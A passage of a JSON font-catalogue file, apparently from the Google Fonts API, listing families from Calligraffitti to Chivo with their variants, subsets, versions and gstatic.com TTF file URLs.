{\n        \"regular\": \"http://fonts.gstatic.com/s/calligraffitti/v19/46k2lbT3XjDVqJw3DCmCFjE0vnFZM5ZBpYN-.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cambay\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cambay/v12/SLXJc1rY6H0_ZDsGbrSIz9JsaA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/cambay/v12/SLXLc1rY6H0_ZDs2bL6M7dd8aGZk.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cambay/v12/SLXKc1rY6H0_ZDs-0pusx_lwYX99kA.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/cambay/v12/SLXMc1rY6H0_ZDs2bIYwwvN0Q3ptkDMN.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cambo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cambo/v17/IFSqHeNEk8FJk416ok7xkPm8.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Candal\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/candal/v15/XoHn2YH6T7-t_8cNAR4Jt9Yxlw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cantarell\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cantarell/v17/B50NF7ZDq37KMUvlO01Ji6hqHK-CLA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/cantarell/v17/B50LF7ZDq37KMUvlO015iaJuPqqSLJYf.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cantarell/v17/B50IF7ZDq37KMUvlO01xN4dOFISeJY8GgQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/cantarell/v17/B50WF7ZDq37KMUvlO015iZrSEY6aB4oWgWHB.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cantata One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cantataone/v15/PlI5Fl60Nb5obNzNe2jslVxEt8CwfGaD.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cantora One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cantoraone/v19/gyB4hws1JdgnKy56GB_JX6zdZ4vZVbgZ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Capriola\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/capriola/v13/wXKoE3YSppcvo1PDln_8L-AinG8y.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Caramel\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/caramel/v7/P5sCzZKBbMTf_ShyxCRuiZ-uydg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Carattere\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/carattere/v7/4iCv6Kp1b9dXlgt_CkvTt2aMH4V_gg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cardo\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cardo/v19/wlp_gwjKBV1pqiv_1oAZ2H5O.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/cardo/v19/wlpxgwjKBV1pqhv93IQ73W5OcCk.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cardo/v19/wlpygwjKBV1pqhND-aQR82JHaTBX.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Carme\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/carme/v16/ptRHTiWdbvZIDOjGxLNrxfbZ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Carrois Gothic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/carroisgothic/v16/Z9XPDmFATg-N1PLtLOOxvIHl9ZmD3i7ajcJ-.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Carrois Gothic SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/carroisgothicsc/v15/ZgNJjOVHM6jfUZCmyUqT2A2HVKjc-28nNHabY4dN.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Carter One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/carterone/v17/q5uCsoe5IOB2-pXv9UcNIxR2hYxREMs.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Castoro\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/castoro/v18/1q2GY5yMCld3-O4cHYhEzOYenEU.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/castoro/v18/1q2EY5yMCld3-O4cLYpOyMQbjEX5fw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Catamaran\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"tamil\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjc1anXuluiLyw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPPjd1anXuluiLyw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPCbd1anXuluiLyw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjd1anXuluiLyw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPErd1anXuluiLyw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPKba1anXuluiLyw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPJ_a1anXuluiLyw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPPja1anXuluiLyw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/catamaran/v17/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPNHa1anXuluiLyw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Caudex\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/caudex/v15/esDQ311QOP6BJUrIyviAnb4eEw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/caudex/v15/esDS311QOP6BJUr4yPKEv7sOE4in.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/caudex/v15/esDT311QOP6BJUrwdteklZUCGpG-GQ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/caudex/v15/esDV311QOP6BJUr4yMo4kJ8GOJSuGdLB.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Caveat\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/caveat/v17/WnznHAc5bAfYB2QRah7pcpNvOx-pjfJ9SIKjYBxPigs.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/caveat/v17/WnznHAc5bAfYB2QRah7pcpNvOx-pjcB9SIKjYBxPigs.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/caveat/v17/WnznHAc5bAfYB2QRah7pcpNvOx-pjSx6SIKjYBxPigs.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/caveat/v17/WnznHAc5bAfYB2QRah7pcpNvOx-pjRV6SIKjYBxPigs.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Caveat Brush\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/caveatbrush/v11/EYq0maZfwr9S9-ETZc3fKXtMW7mT03pdQw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cedarville Cursive\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cedarvillecursive/v17/yYL00g_a2veiudhUmxjo5VKkoqA-B_neJbBxw8BeTg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ceviche One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cevicheone/v16/gyB4hws1IcA6JzR-GB_JX6zdZ4vZVbgZ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chakra Petch\",\n      \"variants\": [\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/chakrapetch/v9/cIflMapbsEk7TDLdtEz1BwkeNIhFQJXE3AY00g.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/chakrapetch/v9/cIfnMapbsEk7TDLdtEz1BwkWmpLJQp_A_gMk0izH.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/chakrapetch/v9/cIf6MapbsEk7TDLdtEz1BwkmmKBhSL7Y1Q.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/chakrapetch/v9/cIfkMapbsEk7TDLdtEz1BwkWmqplarvI1R8t.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/chakrapetch/v9/cIflMapbsEk7TDLdtEz1BwkebIlFQJXE3AY00g.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/chakrapetch/v9/cIfnMapbsEk7TDLdtEz1BwkWmpKRQ5_A_gMk0izH.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/chakrapetch/v9/cIflMapbsEk7TDLdtEz1BwkeQI5FQJXE3AY00g.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/chakrapetch/v9/cIfnMapbsEk7TDLdtEz1BwkWmpK9RJ_A_gMk0izH.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/chakrapetch/v9/cIflMapbsEk7TDLdtEz1BwkeJI9FQJXE3AY00g.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/chakrapetch/v9/cIfnMapbsEk7TDLdtEz1BwkWmpLZRZ_A_gMk0izH.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Changa\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZy2xQjDp9htf1ZM.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZ_OxQjDp9htf1ZM.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZ62xQjDp9htf1ZM.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZ5-xQjDp9htf1ZM.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZ3O2QjDp9htf1ZM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZ0q2QjDp9htf1ZM.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/changa/v20/2-c79JNi2YuVOUcOarRPgnNGooxCZy22QjDp9htf1ZM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Changa One\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/changaone/v18/xfu00W3wXn3QLUJXhzq46AbouLfbK64.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/changaone/v18/xfu20W3wXn3QLUJXhzq42ATivJXeO67ISw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chango\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/chango/v21/2V0cKI0OB5U7WaJyz324TFUaAw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Charis SIL\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/charissil/v1/oPWK_kV3l-s-Q8govXvKrPrmYjZ2Xn0.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/charissil/v1/oPWI_kV3l-s-Q8govXvKnPjsZhRzTn2Ozw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/charissil/v1/oPWJ_kV3l-s-Q8govXvKlEbJRj5dQnSX1ko.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/charissil/v1/oPWX_kV3l-s-Q8govXvKnPjU2jtXRlaSxkrMCQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Charm\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/charm/v10/7cHmv4oii5K0MeYvIe804WIo.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/charm/v10/7cHrv4oii5K0Md6TDss8yn4hnCci.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Charmonman\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/charmonman/v18/MjQDmiR3vP_nuxDv47jiWJGovLdh6OE.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/charmonman/v18/MjQAmiR3vP_nuxDv47jiYC2HmL9K9OhmGnY.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chathura\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/chathura/v20/_gP91R7-rzUuVjim42dEq0SbTvZyuDo.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/chathura/v20/_gP81R7-rzUuVjim42eMiWSxYPp7oSNy.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/chathura/v20/_gP71R7-rzUuVjim418goUC5S-Zy.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/chathura/v20/_gP81R7-rzUuVjim42ecjmSxYPp7oSNy.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/chathura/v20/_gP81R7-rzUuVjim42eAjWSxYPp7oSNy.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chau Philomene One\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/chauphilomeneone/v15/55xxezRsPtfie1vPY49qzdgSlJiHRQFsnIx7QMISdQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/chauphilomeneone/v15/55xzezRsPtfie1vPY49qzdgSlJiHRQFcnoZ_YscCdXQB.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chela One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/chelaone/v21/6ae-4KC7Uqgdz_JZdPIy31vWNTMwoQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chelsea Market\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/chelseamarket/v13/BCawqZsHqfr89WNP_IApC8tzKBhlLA4uKkWk.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chenla\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/chenla/v25/SZc43FDpIKu8WZ9eXxfonUPL6Q.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cherish\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cherish/v7/ll88K2mXUyqsDsTN5iDCI6IJjg8.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cherry Cream Soda\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cherrycreamsoda/v21/UMBIrOxBrW6w2FFyi9paG0fdVdRciTd6Cd47DJ7G.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Cherry Swash\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-04-21\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/cherryswash/v18/i7dNIFByZjaNAMxtZcnfAy58QHi-EwWMbg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/cherryswash/v18/i7dSIFByZjaNAMxtZcnfAy5E_FeaGy6QZ3WfYg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chewy\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/chewy/v18/uK_94ruUb-k-wk5xIDMfO-ed.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chicle\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/chicle/v21/lJwG-pw9i2dqU-BDyWKuobYSxw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chilanka\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"malayalam\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/chilanka/v18/WWXRlj2DZQiMJYaYRrJQI9EAZhTO.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Chivo\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-11-18\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/chivo/v18/va9b4kzIxd1KFppkaRKvDRPJVDf_vB7ul2DSFXjQiQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/chivo/v18/va9b4kzIxd1KFppkaRKvDRPJVDf_PB_ul2DSFXjQiQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/chivo/v18/va9b4kzIxd1KFppkaRKvDRPJVDf_4h_ul2DSFXjQiQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/chivo/v18/va9b4kzIxd1KFppkaRKvDRPJVDf_vB_ul2DSFXjQiQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/chivo/v18/va9b4kzIxd1KFppkaRKvDRPJVDf_jh_ul2DSFXjQiQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/chivo/v18/va9b4kzIxd1KFppkaRKvDRPJVDf_Yhjul2DSFXjQiQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/chivo/v18/va9b4kzIxd1KFppkaRKvDRPJVDf_Wxjul2DSFXjQiQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/chivo/v18/va9b4kzIxd1KFppkaRKvDRPJVDf_PBjul2DSFXjQiQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/chivo/v18/va9b4kzIxd1KFppkaRKvDRPJVDf_FRjul2DSFXjQiQ.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/chivo/v18/va9Z4kzIxd1KFrBtW-13ZHhT-jDqdFwG1WrWN33AiasJ.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/chivo/v18/va9Z4kzIxd1KFrBtW-13ZHhT-jDqdFyG1GrWN33AiasJ.ttf\",\n        \"300italic\": 